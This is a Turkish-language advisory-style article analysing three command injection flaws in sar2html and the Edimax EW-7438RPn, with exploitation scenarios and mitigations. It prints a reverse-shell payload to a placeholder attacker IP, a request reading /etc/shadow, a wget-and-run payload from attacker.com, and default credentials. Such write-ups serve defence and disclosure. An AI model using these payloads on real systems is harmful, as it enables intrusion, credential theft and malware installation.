Kritik OS (Edimax) Komut Enjeksiyonu Ev Sistemleri Güvenlik Açıkları
Giriş
Son zamanlarda sar2html ve Edimax EW-7438RPn Mini cihazlarını etkileyen üç kritik işletim sistemi komut enjeksiyonu güvenlik açığı açıklandı. Bu güvenlik açıkları saldırganların güvenlik açığı olan sistemlerde keyfi komutlar yürütmesine olanak tanır ve potansiyel olarak sistemin tamamen tehlikeye atılmasına yol açar. Bu makale her güvenlik açığı için ayrıntılı teknik analiz ve örnek istismar senaryoları sağlar.
1. CVE-2025-34030: plot Parametresi aracılığıyla sar2html Komut Enjeksiyonu
Güvenlik Açığı Genel Bakışı
- Etkilenen Ürün : sar2html (sürüm 3.2.2 ve öncesi)
- Saldırı Vektörü : Uzaktan, kimliği doğrulanmamış
- CVSS Puanı : 10.0 (Kritik)
- Savunmasız Bileşen :
index.php
plot parametresi
Teknik Analiz
Sistem etkinliği verilerini görselleştirmek için kullanılan sar2html uygulaması, plot
betiğin parametresindeki kullanıcı girdisini düzgün bir şekilde temizlemede başarısız oluyor index.php
. Uygulama, bu parametreyi uygun doğrulama veya kaçış olmadan doğrudan sistem komutlarına dahil ediyor.
Sömürü Senaryosu
Adım 1: Keşif
Bir saldırgan, şu adreste savunmasız bir sar2html kurulumunu tespit ediyor:http://target-server/sar2html/
Adım 2: İlk Test
Saldırgan basit bir komut enjeksiyon testi gönderir:
http://target-server/sar2html/index.php?plot=;id
Bu, id
komutu uygulamanın yürüttüğü sistem komutuna ekler.
Adım 3: Komut Yürütme
id
Uygulama , arayüzünde komutun çıktısını görüntüleyerek güvenlik açığını doğruluyor.
Adım 4: Ters Kabuk Oluşturma
Saldırgan, ters bir kabuk oluşturmak için daha karmaşık bir yük oluşturur:
http://target-server/sar2html/index.php?plot=;bash+-c+'bash+-i+>%26+/dev/tcp/attacker-ip/4444+0>%261'
Bu komut saldırganın makinesine ters bir kabuk bağlantısı oluşturur.
Adım 5: Sömürü Sonrası
Kabuk erişimi elde edildikten sonra saldırgan şunları yapabilir:
- Keşif gerçekleştir (
uname -a
,cat /etc/passwd
) - Kalıcı erişim oluşturun (SSH anahtarları, cron işleri ekleyin)
- Ağ içerisinde yanal olarak hareket edin
Azaltma
- sar2html sürüm 3.2.3 veya sonraki bir sürüme yükseltin
- Giriş doğrulamasını uygulayın ve argümanları düzgün şekilde işleyen komut yürütme API'lerini kullanın
- Uygulamayı en az ayrıcalıkla çalıştır
2. CVE-2025-34029: syscmd.asp aracılığıyla Edimax EW-7438RPn Komut Enjeksiyonu
Güvenlik Açığı Genel Bakışı
- Etkilenen Ürün : Edimax EW-7438RPn Mini (1.13 ve öncesi aygıt yazılımı)
- Saldırı Vektörü : Uzaktan, kimliği doğrulanmış
- CVSS Puanı : 9.4 (Kritik)
- Güvenlik Açığı Olan Bileşen :
/goform/formSysCmd
uç nokta
Teknik Analiz
Cihazın web arayüzü, ' syscmd.asp
e gönderilen istekleri işleyen bir sistem komut işleyicisi içerir /goform/formSysCmd
. sysCmd
Parametre, kök olarak yürütülen keyfi komutları kabul eder.
Sömürü Senaryosu
Adım 1: Kimlik doğrulama
Saldırgan geçerli kimlik bilgilerini şu şekilde elde eder:
- Varsayılan kimlik bilgileri (admin:1234)
- Kimlik bilgisi kaba kuvvetle zorlama
- Diğer ihlallerden kimlik bilgisi toplama
Adım 2: Komut Enjeksiyonu
Saldırgan, güvenlik açığı bulunan uç noktaya bir POST isteği gönderir:
POST /goform/formSysCmd HTTP/1.1
Host: target-router
Content-Type: application/x-www-form-urlencoded
sysCmd=cat+/etc/shadow
Adım 3: Ayrıcalık Yükseltmesi
Komutlar root olarak çalıştırıldığından saldırgan şunları yapabilir:
- Şifre karmalarını ayıkla
- Sistem yapılandırmasını değiştir
- Kalıcı arka kapılar kurun
Adım 4: Ağ Pivotlaması
Tehlikeye atılan yönlendirici şu amaçlarla kullanılabilir:
- Ağ trafiğini durdurun
- DNS sorgularını yeniden yönlendir
- Diğer dahili sistemlere saldırın
Azaltma
- Ürün yazılımınızı 1.14 veya sonraki bir sürüme yükseltin
- Yönetimsel arayüz erişimini kısıtla
- Varsayılan kimlik bilgilerini değiştir
- Ağ segmentasyonunu uygulayın
3. CVE-2025-34024: Edimax EW-7438RPn Komut Enjeksiyonu mp.asp aracılığıyla
Güvenlik Açığı Genel Bakışı
- Etkilenen Ürün : Edimax EW-7438RPn (1.13 ve öncesi aygıt yazılımı)
- Saldırı Vektörü : Uzaktan, kimliği doğrulanmış
- CVSS Puanı : 9.4 (Kritik)
- Güvenlik Açığı Olan Bileşen :
/goform/mp
uç nokta
Teknik Analiz
Medya oynatıcı yapılandırma işleyicisi, mp.asp
'e gönderilen istekleri işler /goform/mp
. command
Parametre, komut enjeksiyonuna izin veren kabuk metakarakterlerini kabul eder.
Sömürü Senaryosu
Adım 1: Kimlik doğrulama
CVE-2025-34029'da olduğu gibi saldırgan önce geçerli kimlik bilgilerini elde eder.
Adım 2: Komut Enjeksiyonu
Saldırgan, gömülü komutlarla bir POST isteği oluşturur:
POST /goform/mp HTTP/1.1
Host: target-router
Content-Type: application/x-www-form-urlencoded
command=test;wget+http://attacker.com/malware.sh+-O+/tmp/malware.sh;sh+/tmp/malware.sh
Adım 3: Kötü Amaçlı Yazılımın Yürütülmesi
Yük:
- Saldırganın sunucusundan kötü amaçlı bir betik indirir
- /tmp/malware.sh'ye kaydeder
- Komut dosyasını kök ayrıcalıklarıyla çalıştırır
Adım 4: Kalıcı Erişim
Kötü amaçlı yazılım şunları yapabilir:
- Ürün yazılımı bileşenlerini değiştirin
- Gizli yönetici hesapları oluşturun
- Paket koklayıcıları yükleyin
Azaltma
- Ürün yazılımı güncellemelerini hemen uygulayın
- Gerekmiyorsa uzaktan yönetimi devre dışı bırakın
- Şüpheli giden bağlantıları izleyin
- Tüm form işleyicilerinde sıkı giriş doğrulamasını uygulayın
Çözüm
Bu kritik güvenlik açıkları, web arayüzlerindeki komut enjeksiyonu kusurlarının sistemin tamamını tehlikeye atabileceğini göstermektedir. Sar2html güvenlik açığı, kimlik doğrulaması gerektirmediği için özellikle tehlikelidir. Kuruluşlar şunları yapmalıdır:
- Çevrelerindeki tüm etkilenen ürünleri envanterleyin
- Yamaları hemen uygulayın
- İstismar girişimlerini izleyin
- Ağ segmentasyonu ve en az ayrıcalıklı erişim dahil olmak üzere derinlemesine savunma stratejilerini uygulayın
Hemen yama uygulanamayan sistemler için, bu tür saldırı modellerini engellemek üzere özel olarak tasarlanmış kurallara sahip web uygulama güvenlik duvarları uygulamayı düşünün.